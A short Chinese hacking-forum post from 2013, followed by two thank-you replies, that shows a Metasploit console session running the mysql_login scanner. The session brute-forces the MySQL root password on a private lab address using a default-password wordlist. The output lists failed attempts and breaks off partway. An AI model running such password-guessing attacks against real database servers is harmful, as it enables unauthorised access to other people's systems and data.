搜索
查看: 362|回复: 2

Metasploit扫描Mysql弱口令

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-10-27 21:59:33 | 显示全部楼层 |阅读模式
msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set RHOSTS 5.5.5.3

RHOSTS => 5.5.5.3

msf auxiliary(mysql_login) > set USERNAME root

USERNAME => root

msf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt

PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 5.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 5.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 5.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 5.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 5.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 5.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’

​

854955425 该用户已被删除
发表于 2013-10-27 23:32:29 | 显示全部楼层
学习了,不错,讲的太有道理了
854955425 该用户已被删除
发表于 2013-10-28 00:23:00 | 显示全部楼层
相当不错,感谢无私分享精神!
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表